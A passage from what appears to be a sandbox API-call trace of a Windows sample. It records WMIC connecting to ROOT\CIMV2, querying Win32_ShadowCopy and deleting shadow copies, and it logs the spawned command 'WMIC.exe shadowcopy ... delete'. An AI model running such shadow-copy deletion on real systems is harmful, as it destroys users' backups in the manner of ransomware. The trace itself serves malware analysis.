lstrlenW (lpString="CALL") returned 4 [0098.771] lstrlenW (lpString="delete") returned 6 [0098.771] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0098.771] lstrlenW (lpString="ASSOC") returned 5 [0098.771] lstrlenW (lpString="delete") returned 6 [0098.771] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0098.771] lstrlenW (lpString="CREATE") returned 6 [0098.771] lstrlenW (lpString="delete") returned 6 [0098.771] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0098.771] lstrlenW (lpString="DELETE") returned 6 [0098.771] lstrlenW (lpString="delete") returned 6 [0098.771] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0098.771] malloc (_Size=0x18) returned 0x24cc00 [0098.771] lstrlenA (lpString="") returned 0 [0098.771] malloc (_Size=0x2) returned 0x41dfb0 [0098.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1d314c, cbMultiByte=-1, lpWideCharStr=0x41dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.771] free (_Block=0x41dfb0) [0098.771] malloc (_Size=0x18) returned 0x24cca0 [0098.771] lstrlenA (lpString="") returned 0 [0098.771] malloc (_Size=0x2) returned 0x41dfb0 [0098.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1d314c, cbMultiByte=-1, lpWideCharStr=0x41dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.771] free (_Block=0x41dfb0) [0098.771] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.771] malloc (_Size=0x3e) returned 0x24d080 [0098.771] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0098.772] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0098.772] malloc (_Size=0x18) returned 0x24cba0 [0098.772] free (_Block=0x24cca0) [0098.772] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0098.772] lstrlenW (lpString="FROM") returned 4 [0098.772] lstrlenW (lpString="*") returned 1 [0098.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0098.772] malloc (_Size=0x18) returned 0x24cca0 [0098.772] free (_Block=0x24cba0) [0098.772] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0098.772] lstrlenW (lpString="FROM") returned 4 [0098.772] lstrlenW (lpString="from") returned 4 [0098.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0098.772] malloc (_Size=0x18) returned 0x24cba0 [0098.772] free (_Block=0x24cca0) [0098.772] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0098.772] malloc (_Size=0x18) returned 0x24cca0 [0098.772] free (_Block=0x24cba0) [0098.772] free (_Block=0x24d080) [0098.772] malloc (_Size=0x18) returned 0x24cba0 [0098.773] malloc (_Size=0x18) returned 0x24cc20 [0098.773] malloc (_Size=0x18) returned 0x24cc40 [0098.773] malloc (_Size=0x18) returned 0x24cc60 [0098.773] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0098.773] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0098.773] malloc (_Size=0x18) returned 0x24cc80 [0098.773] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0098.773] SysStringLen (param_1=" WHERE ") returned 0x7 [0098.773] malloc (_Size=0x18) returned 0x24ccc0 [0098.773] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0098.773] SysStringLen (param_1="ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'") returned 0x2b [0098.773] free (_Block=0x24cc00) [0098.773] free (_Block=0x24cc80) [0098.773] free (_Block=0x24cc60) [0098.773] free (_Block=0x24cc40) [0098.773] free (_Block=0x24cc20) [0098.774] free (_Block=0x24cba0) [0098.774] ??0CHString@@QEAA@XZ () returned 0x18f3b0 [0098.774] GetCurrentThreadId () returned 0x90c [0098.774] malloc (_Size=0x18) returned 0x24cba0 [0098.774] malloc (_Size=0x18) returned 0x24cc20 [0098.774] malloc (_Size=0x18) returned 0x24cc40 [0098.774] malloc (_Size=0x18) returned 0x24cc60 [0098.774] malloc (_Size=0x18) returned 0x24cc80 [0098.774] SysStringLen (param_1="\\\\") returned 0x2 [0098.774] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0098.774] malloc (_Size=0x18) returned 0x24cc00 [0098.774] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0098.774] SysStringLen (param_1="\\") returned 0x1 [0098.774] malloc (_Size=0x18) returned 0x24cce0 [0098.774] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0098.774] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0098.775] free (_Block=0x24cc00) [0098.775] free (_Block=0x24cc80) [0098.775] free (_Block=0x24cc60) [0098.775] free (_Block=0x24cc40) [0098.775] free (_Block=0x24cc20) [0098.775] free (_Block=0x24cba0) [0098.775] malloc (_Size=0x18) returned 0x24cba0 [0098.775] malloc (_Size=0x18) returned 0x24cc20 [0098.775] malloc (_Size=0x18) returned 0x24cc40 [0098.775] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ee1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff2429d0 | out: ppNamespace=0xff2429d0*=0x1ef3c18) returned 0x0 [0098.781] free (_Block=0x24cc40) [0098.781] free (_Block=0x24cc20) [0098.781] free (_Block=0x24cba0) [0098.781] CoSetProxyBlanket (pProxy=0x1ef3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0098.781] free (_Block=0x24cce0) [0098.781] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0098.781] ??0CHString@@QEAA@XZ () returned 0x18f300 [0098.781] GetCurrentThreadId () returned 0x90c [0098.781] malloc (_Size=0x18) returned 0x24cce0 [0098.781] lstrlenA (lpString="") returned 0 [0098.781] malloc (_Size=0x2) returned 0x41dfb0 [0098.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff1d314c, cbMultiByte=-1, lpWideCharStr=0x41dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0098.782] free (_Block=0x41dfb0) [0098.782] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'") returned 0x50 [0098.782] SysStringLen (param_1="") returned 0x0 [0098.782] free (_Block=0x24cce0) [0098.782] malloc (_Size=0x18) returned 0x24cce0 [0098.782] IWbemServices:ExecQuery (in: This=0x1ef3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'", lFlags=0, pCtx=0x0, ppEnum=0x18f308 | out: ppEnum=0x18f308*=0x1ef3d18) returned 0x0 [0098.862] free (_Block=0x24cce0) [0098.863] CoSetProxyBlanket (pProxy=0x1ef3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0098.866] IEnumWbemClassObject:Next (in: This=0x1ef3d18, lTimeout=-1, uCount=0x1, apObjects=0x18f310, puReturned=0x18f320 | out: apObjects=0x18f310*=0x1ef3d80, puReturned=0x18f320*=0x1) returned 0x0 [0098.867] malloc (_Size=0x18) returned 0x24cce0 [0098.867] IWbemClassObject:Get (in: This=0x1ef3d80, wszName="__PATH", lFlags=0, pVal=0x18f330*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f330*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0098.867] free (_Block=0x24cce0) [0098.867] malloc (_Size=0x800) returned 0x24d080 [0098.867] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x24d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0098.868] FormatMessageW (in: dwFlags=0x2500, lpSource=0x24d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x18f258, nSize=0x0, Arguments=0x18f268 | out: lpBuffer="뚐9") returned 0x67 [0098.868] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0098.868] malloc (_Size=0x68) returned 0x24d890 [0098.868] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x24d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0098.868] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff242ab0 [0098.868] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0098.869] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0098.869] free (_Block=0x24d890) [0098.869] free (_Block=0x24d080) [0098.869] LocalFree (hMem=0x39b690) returned 0x0 [0098.869] IWbemServices:DeleteInstance (in: This=0x1ef3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{05121166-67F2-4EA9-83D8-EDC08F680DA7}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0099.889] IUnknown:Release (This=0x1ef3d80) returned 0x0 [0099.889] malloc (_Size=0x800) returned 0x24d080 [0099.889] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x24d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0099.889] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0099.889] malloc (_Size=0x20) returned 0x24cef0 [0099.889] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x24cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0099.889] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff242ab0 [0099.889] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0099.890] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0099.890] free (_Block=0x24cef0) [0099.890] free (_Block=0x24d080) [0099.890] IEnumWbemClassObject:Next (in: This=0x1ef3d18, lTimeout=-1, uCount=0x1, apObjects=0x18f310, puReturned=0x18f320 | out: apObjects=0x18f310*=0x0, puReturned=0x18f320*=0x0) returned 0x1 [0099.892] IUnknown:Release (This=0x1ef3d18) returned 0x0 [0099.894] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0099.894] free (_Block=0x24cca0) [0099.894] free (_Block=0x24ccc0) [0099.894] GetCurrentThreadId () returned 0x90c [0099.894] ??0CHString@@QEAA@PEBG@Z () returned 0x18f4e8 [0099.894] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x18f4e8 [0099.894] lstrlenW (lpString="LIST") returned 4 [0099.894] lstrlenW (lpString="delete") returned 6 [0099.894] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0099.894] lstrlenW (lpString="ASSOC") returned 5 [0099.894] lstrlenW (lpString="delete") returned 6 [0099.894] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0099.894] lstrlenW (lpString="GET") returned 3 [0099.894] lstrlenW (lpString="delete") returned 6 [0099.894] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0099.894] ??1CHString@@QEAA@XZ () returned 0x75ff8301 [0099.894] WbemLocator:IUnknown:Release (This=0x1ef3c18) returned 0x0 [0099.895] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0099.895] _kbhit () returned 0x0 [0099.895] free (_Block=0x246f20) [0099.896] free (_Block=0x24cac0) [0099.896] free (_Block=0x24caa0) [0099.896] free (_Block=0x24ca80) [0099.896] free (_Block=0x24ca60) [0099.896] free (_Block=0x2470a0) [0099.896] free (_Block=0x24cb40) [0099.896] free (_Block=0x2485c0) [0099.896] free (_Block=0x24d020) [0099.896] free (_Block=0x24cbc0) [0099.896] free (_Block=0x24cfa0) [0099.896] free (_Block=0x24cae0) [0099.896] free (_Block=0x24cbe0) [0099.896] free (_Block=0x247140) [0099.896] free (_Block=0x246e00) [0099.896] free (_Block=0x24cff0) [0099.896] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0099.896] free (_Block=0x24ce20) [0099.896] free (_Block=0x24cb00) [0099.896] free (_Block=0x24cb20) [0099.896] free (_Block=0x24cf30) [0099.896] free (_Block=0x24cb60) [0099.896] free (_Block=0x247ee0) [0099.896] free (_Block=0x247f30) [0099.896] free (_Block=0x247f80) [0099.896] free (_Block=0x24cb80) [0099.896] free (_Block=0x246a20) [0099.897] free (_Block=0x246de0) [0099.897] free (_Block=0x248040) [0099.897] free (_Block=0x246dc0) [0099.897] free (_Block=0x248000) [0099.897] free (_Block=0x246d60) [0099.897] free (_Block=0x246d80) [0099.897] free (_Block=0x246c40) [0099.897] free (_Block=0x246c60) [0099.897] free (_Block=0x246be0) [0099.897] free (_Block=0x246c00) [0099.897] free (_Block=0x246ca0) [0099.897] free (_Block=0x246cc0) [0099.897] free (_Block=0x246d00) [0099.897] free (_Block=0x246d20) [0099.897] free (_Block=0x246b20) [0099.897] free (_Block=0x246b40) [0099.897] free (_Block=0x246ac0) [0099.897] free (_Block=0x246ae0) [0099.897] free (_Block=0x246b80) [0099.897] free (_Block=0x246ba0) [0099.897] free (_Block=0x246a60) [0099.897] free (_Block=0x246a80) [0099.898] free (_Block=0x2469d0) [0099.898] free (_Block=0x2469a0) [0099.898] free (_Block=0x246e90) [0099.898] WbemLocator:IUnknown:Release (This=0x1ee1390) returned 0x2 [0099.898] WbemLocator:IUnknown:Release (This=0x1ef3b28) returned 0x0 [0099.898] WbemLocator:IUnknown:Release (This=0x1ef3a98) returned 0x0 [0099.898] WbemLocator:IUnknown:Release (This=0x1ee1390) returned 0x1 [0099.899] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0099.899] WbemLocator:IUnknown:Release (This=0x1ee1390) returned 0x0 [0099.899] free (_Block=0x24c9e0) [0099.899] free (_Block=0x24ca00) [0099.899] free (_Block=0x248540) [0099.899] free (_Block=0x24ca20) [0099.899] free (_Block=0x24ca40) [0099.899] free (_Block=0x248580) [0099.899] free (_Block=0x24c860) [0099.899] free (_Block=0x24c880) [0099.899] free (_Block=0x2483c0) [0099.899] free (_Block=0x24c8a0) [0099.899] free (_Block=0x24c8c0) [0099.899] free (_Block=0x248400) [0099.899] free (_Block=0x24c7e0) [0099.899] free (_Block=0x24c800) [0099.899] free (_Block=0x248340) [0099.899] free (_Block=0x24c820) [0099.899] free (_Block=0x24c840) [0099.899] free (_Block=0x248380) [0099.899] free (_Block=0x24c960) [0099.900] free (_Block=0x24c980) [0099.900] free (_Block=0x2484c0) [0099.900] free (_Block=0x24c9a0) [0099.900] free (_Block=0x24c9c0) [0099.900] free (_Block=0x248500) [0099.900] free (_Block=0x24c760) [0099.900] free (_Block=0x24c780) [0099.900] free (_Block=0x2482c0) [0099.900] free (_Block=0x24c7a0) [0099.900] free (_Block=0x24c7c0) [0099.900] free (_Block=0x248300) [0099.900] free (_Block=0x24c8e0) [0099.900] free (_Block=0x24c900) [0099.900] free (_Block=0x248440) [0099.900] free (_Block=0x24c920) [0099.900] free (_Block=0x24c940) [0099.900] free (_Block=0x248480) [0099.900] free (_Block=0x24c6a0) [0099.900] free (_Block=0x24c6c0) [0099.900] free (_Block=0x248200) [0099.900] free (_Block=0x24c560) [0099.901] free (_Block=0x24c580) [0099.901] free (_Block=0x2480c0) [0099.901] free (_Block=0x246e50) [0099.901] free (_Block=0x246e70) [0099.901] free (_Block=0x248080) [0099.901] free (_Block=0x24c5e0) [0099.901] free (_Block=0x24c600) [0099.901] free (_Block=0x248140) [0099.901] free (_Block=0x24c6e0) [0099.901] free (_Block=0x24c700) [0099.901] free (_Block=0x248240) [0099.901] free (_Block=0x24c5a0) [0099.901] free (_Block=0x24c5c0) [0099.901] free (_Block=0x248100) [0099.901] free (_Block=0x24c620) [0099.901] free (_Block=0x24c640) [0099.901] free (_Block=0x248180) [0099.901] free (_Block=0x24c660) [0099.901] free (_Block=0x24c680) [0099.901] free (_Block=0x2481c0) [0099.902] free (_Block=0x24c720) [0099.902] free (_Block=0x24c740) [0099.902] free (_Block=0x248280) [0099.902] CoUninitialize () [0099.932] exit (_Code=0) [0099.932] free (_Block=0x24cd30) [0099.932] free (_Block=0x247ea0) [0099.932] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0099.932] free (_Block=0x246f40) [0099.932] free (_Block=0x246a40) [0099.932] free (_Block=0x247e60) [0099.932] free (_Block=0x247e20) [0099.932] free (_Block=0x247dd0) [0099.932] free (_Block=0x247d90) [0099.932] free (_Block=0x247d30) [0099.932] free (_Block=0x245a90) [0099.932] free (_Block=0x245a50) [0099.932] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0099.932] free (_Block=0x24cec0) Thread: id = 159 os_tid = 0xa98 Thread: id = 160 os_tid = 0x8ec Thread: id = 161 os_tid = 0x8fc Thread: id = 162 os_tid = 0x8bc Thread: id = 163 os_tid = 0x8dc Process: id = "24" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x73ff9000" os_pid = "0x84c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 164 os_tid = 0x86c [0100.037] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afdd0 | out: lpSystemTimeAsFileTime=0x1afdd0*(dwLowDateTime=0x4336f5f0, dwHighDateTime=0x1d68245)) [0100.037] GetCurrentProcessId () returned 0x84c [0100.037] GetCurrentThreadId () returned 0x86c [0100.037] GetTickCount () returned 0x114eb78 [0100.037] QueryPerformanceCounter (in: lpPerformanceCount=0x1afdd8 | out: lpPerformanceCount=0x1afdd8*=21993046308) returned 1 [0100.040] GetModuleHandleW (lpModuleName=0x0) returned 0x4a8e0000 [0100.040] __set_app_type (_Type=0x1) [0100.040] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a907810) returned 0x0 [0100.040] __getmainargs (in: _Argc=0x4a92a608, _Argv=0x4a92a618, _Env=0x4a92a610, _DoWildCard=0, _StartInfo=0x4a90e0f4 | out: _Argc=0x4a92a608, _Argv=0x4a92a618, _Env=0x4a92a610) returned 0 [0100.040] GetCurrentThreadId () returned 0x86c [0100.040] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x86c) returned 0x3c [0100.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0100.041] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0100.041] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.042] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0100.042] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afd68 | out: phkResult=0x1afd68*=0x0) returned 0x2 [0100.042] VirtualQuery (in: lpAddress=0x1afd50, lpBuffer=0x1afcd0, dwLength=0x30 | out: lpBuffer=0x1afcd0*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0100.042] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afcd0, dwLength=0x30 | out: lpBuffer=0x1afcd0*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0100.042] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afcd0, dwLength=0x30 | out: lpBuffer=0x1afcd0*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0100.042] VirtualQuery (in: lpAddress=0xb4000, lpBuffer=0x1afcd0, dwLength=0x30 | out: lpBuffer=0x1afcd0*(BaseAddress=0xb4000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0100.042] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afcd0, dwLength=0x30 | out: lpBuffer=0x1afcd0*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0100.042] GetConsoleOutputCP () returned 0x1b5 [0100.042] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a91bfe0 | out: lpCPInfo=0x4a91bfe0) returned 1 [0100.043] SetConsoleCtrlHandler (HandlerRoutine=0x4a903184, Add=1) returned 1 [0100.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.043] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0100.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.043] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a90e194 | out: lpMode=0x4a90e194) returned 1 [0100.043] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.044] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.044] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.044] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a90e198 | out: lpMode=0x4a90e198) returned 1 [0100.044] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.044] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0100.044] GetEnvironmentStringsW () returned 0x278b90* [0100.044] GetProcessHeap () returned 0x260000 [0100.044] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xa7c) returned 0x279620 [0100.045] FreeEnvironmentStringsW (penv=0x278b90) returned 1 [0100.045] GetProcessHeap () returned 0x260000 [0100.045] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x8) returned 0x278a10 [0100.045] GetEnvironmentStringsW () returned 0x278b90* [0100.045] GetProcessHeap () returned 0x260000 [0100.045] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xa7c) returned 0x27a0b0 [0100.045] FreeEnvironmentStringsW (penv=0x278b90) returned 1 [0100.045] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec28 | out: phkResult=0x1aec28*=0x44) returned 0x0 [0100.045] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x0, lpData=0x1aec40*=0x18, lpcbData=0x1aec24*=0x1000) returned 0x2 [0100.045] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x4, lpData=0x1aec40*=0x1, lpcbData=0x1aec24*=0x4) returned 0x0 [0100.045] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x0, lpData=0x1aec40*=0x1, lpcbData=0x1aec24*=0x1000) returned 0x2 [0100.045] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x4, lpData=0x1aec40*=0x0, lpcbData=0x1aec24*=0x4) returned 0x0 [0100.045] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x4, lpData=0x1aec40*=0x40, lpcbData=0x1aec24*=0x4) returned 0x0 [0100.045] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x4, lpData=0x1aec40*=0x40, lpcbData=0x1aec24*=0x4) returned 0x0 [0100.046] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x0, lpData=0x1aec40*=0x40, lpcbData=0x1aec24*=0x1000) returned 0x2 [0100.046] RegCloseKey (hKey=0x44) returned 0x0 [0100.046] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aec28 | out: phkResult=0x1aec28*=0x44) returned 0x0 [0100.046] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x0, lpData=0x1aec40*=0x40, lpcbData=0x1aec24*=0x1000) returned 0x2 [0100.046] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aec20, lpData=0x1aec40, lpcbData=0x1aec24*=0x1000 | out: lpType=0x1aec20*=0x4, lpData=0x1aec40*=0x1, lpcbData=0x1aec24*=0x4) returned 0x0 [0100.046] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aec20, 